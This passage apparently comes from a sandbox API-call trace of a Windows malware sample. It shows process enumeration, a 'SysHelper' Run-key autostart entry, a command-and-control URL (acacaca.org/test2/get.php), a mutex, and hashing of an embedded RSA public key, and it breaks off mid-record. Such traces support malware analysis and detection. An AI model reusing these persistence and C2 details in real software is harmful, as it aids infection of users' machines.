(hModule=0x77430000, lpProcName="EnumProcessModules") returned 0x77431408 [0171.873] GetProcAddress (hModule=0x77430000, lpProcName="GetModuleBaseNameW") returned 0x7743152c [0171.873] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0171.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0171.877] CloseHandle (hObject=0x0) returned 0 [0171.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0171.877] CloseHandle (hObject=0x0) returned 0 [0171.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0171.877] CloseHandle (hObject=0x0) returned 0 [0171.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0171.877] CloseHandle (hObject=0x0) returned 0 [0171.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x0 [0171.878] CloseHandle (hObject=0x0) returned 0 [0171.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0171.878] CloseHandle (hObject=0x0) returned 0 [0171.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a0) returned 0x0 [0171.878] CloseHandle (hObject=0x0) returned 0 [0171.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b4) returned 0x0 [0171.878] CloseHandle (hObject=0x0) returned 0 [0171.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0171.878] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x288) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b8) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x394) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3dc) returned 0x0 [0171.879] CloseHandle (hObject=0x0) returned 0 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x388) returned 0x0 [0171.880] CloseHandle (hObject=0x0) returned 0 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x450) returned 0x0 [0171.880] CloseHandle (hObject=0x0) returned 0 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x4e8 [0171.880] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0171.880] CloseHandle (hObject=0x4e8) returned 1 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0171.880] CloseHandle (hObject=0x0) returned 0 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x500) returned 0x0 [0171.880] CloseHandle (hObject=0x0) returned 0 [0171.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x538) returned 0x0 [0171.881] CloseHandle (hObject=0x0) returned 0 [0171.881] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x654) returned 0x4e8 [0171.881] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0171.881] CloseHandle (hObject=0x4e8) returned 1 [0171.881] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x4e8 [0171.881] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0171.881] CloseHandle (hObject=0x4e8) returned 1 [0171.881] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c4) returned 0x4e8 [0171.881] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0171.881] CloseHandle (hObject=0x4e8) returned 1 [0171.882] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x4e8 [0171.882] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0171.882] CloseHandle (hObject=0x4e8) returned 1 [0171.882] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d8) returned 0x4e8 [0171.882] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0171.883] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 0x44 [0171.883] CloseHandle (hObject=0x4e8) returned 1 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x6ca210 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3f890 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc2958 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc2bc0 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc2e28 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc3090 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc32f8 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc3560 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc37c8 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc3a30 [0171.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc3c98 [0171.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0171.927] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0171.927] RegCloseKey (hKey=0x4e8) returned 0x0 [0171.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x140) returned 0x2c3faf8 [0171.927] lstrlenA (lpString="\" --AutoStart") returned 13 [0171.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x120) returned 0x2c70bc8 [0171.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3faf8 | out: hHeap=0x6a0000) returned 1 [0171.929] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 1 [0171.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x120) returned 0x2c3faf8 [0171.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0171.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x6ca4e0 [0171.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc3f00 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc4168 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc43d0 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2cc4638 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3b8a8 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3bb10 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3bd78 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3bfe0 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3c248 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3c4b0 [0171.930] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x42) returned 0x2c76750 [0171.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2cc3f00, cbMultiByte=-1, lpWideCharStr=0x2c76750, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0171.930] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.930] lstrlenA (lpString="") returned 0 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37730 [0171.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2cc4168, cbMultiByte=-1, lpWideCharStr=0x2c37730, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.930] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.930] lstrlenA (lpString="") returned 0 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c377e0 [0171.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2cc43d0, cbMultiByte=-1, lpWideCharStr=0x2c377e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.930] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.930] lstrlenA (lpString="") returned 0 [0171.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37710 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2cc4638, cbMultiByte=-1, lpWideCharStr=0x2c37710, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37740 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3b8a8, cbMultiByte=-1, lpWideCharStr=0x2c37740, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37760 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3bb10, cbMultiByte=-1, lpWideCharStr=0x2c37760, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37790 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3bd78, cbMultiByte=-1, lpWideCharStr=0x2c37790, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c377a0 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3bfe0, cbMultiByte=-1, lpWideCharStr=0x2c377a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c37780 [0171.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3c248, cbMultiByte=-1, lpWideCharStr=0x2c37780, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.931] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.931] lstrlenA (lpString="") returned 0 [0171.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x2c377b0 [0171.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c3c4b0, cbMultiByte=-1, lpWideCharStr=0x2c377b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0171.932] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0171.932] lstrlenW (lpString="") returned 0 [0171.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12) returned 0x6c6368 [0171.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x288) returned 0x2cc48a0 [0171.932] GetAdaptersInfo (in: AdapterInfo=0x2cc48a0, SizePointer=0x18ea04 | out: AdapterInfo=0x2cc48a0, SizePointer=0x18ea04) returned 0x0 [0171.957] GetAdaptersInfo (in: AdapterInfo=0x2cc48a0, SizePointer=0x18ea04 | out: AdapterInfo=0x2cc48a0, SizePointer=0x18ea04) returned 0x0 [0171.985] GetLastError () returned 0x0 [0171.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x2cccc20 [0171.985] GetLastError () returned 0x0 [0172.007] GetLastError () returned 0x0 [0172.009] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x6e9a40) returned 1 [0172.011] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0172.011] CryptHashData (hHash=0x6cfae0, pbData=0x2c4efe0, dwDataLen=0x11, dwFlags=0x0) returned 1 [0172.011] CryptGetHashParam (in: hHash=0x6cfae0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0172.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x6c6388 [0172.011] CryptGetHashParam (in: hHash=0x6cfae0, dwParam=0x2, pbData=0x6c6388, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x6c6388, pdwDataLen=0x18e9d8) returned 1 [0172.011] GetLastError () returned 0x0 [0172.011] CryptDestroyHash (hHash=0x6cfae0) returned 1 [0172.011] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0172.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4efe0 | out: hHeap=0x6a0000) returned 1 [0172.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84828 [0172.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9040 | out: hHeap=0x6a0000) returned 1 [0172.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d4cc0 | out: hHeap=0x6a0000) returned 1 [0172.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x430) returned 0x4f8 [0172.333] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0xffffffff) returned 0x0 [0172.798] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x4ec [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x28) returned 0x6ca510 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3c718 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3c980 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3cbe8 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3ce50 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3d0b8 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3d320 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3d588 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3d7f0 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3da58 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25c) returned 0x2c3dcc0 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e0) returned 0x2ccdc28 [0172.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5ec) returned 0x2cce648 [0172.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2cce648, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0172.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5f0) returned 0x2ccec40 [0172.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0172.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 [0172.818] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x6e9a40) returned 1 [0172.819] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0172.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0172.819] CryptHashData (hHash=0x6cfae0, pbData=0x2ccec40, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0172.819] CryptGetHashParam (in: hHash=0x6cfae0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0172.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44268 [0172.819] CryptGetHashParam (in: hHash=0x6cfae0, dwParam=0x2, pbData=0x2c44268, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x2c44268, pdwDataLen=0x18ea4c) returned 1 [0172.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x34) returned 0x2cbf9d0 [0172.819] GetLastError () returned 0x0 [0172.819] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0172.819] GetLastError () returned 0x0 [0172.819] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0172.819] GetLastError () returned 0x0 [0172.819] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0172.819] GetLastError () returned 0x0 [0172.819] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0172.819] GetLastError () returned 0x0 [0172.819] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0172.819] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0172.820] GetLastError () returned 0x0 [0172.820] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0172.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44268 | out: hHeap=0x6a0000) returned 1 [0172.821] CryptDestroyHash (hHash=0x6cfae0) returned 1 [0172.821] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0172.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccec40 | out: hHeap=0x6a0000) returned 1 [0172.821] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0172.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e0) returned 0x2ccdc28 [0172.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5ec) returned 0x2cce648 [0172.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC 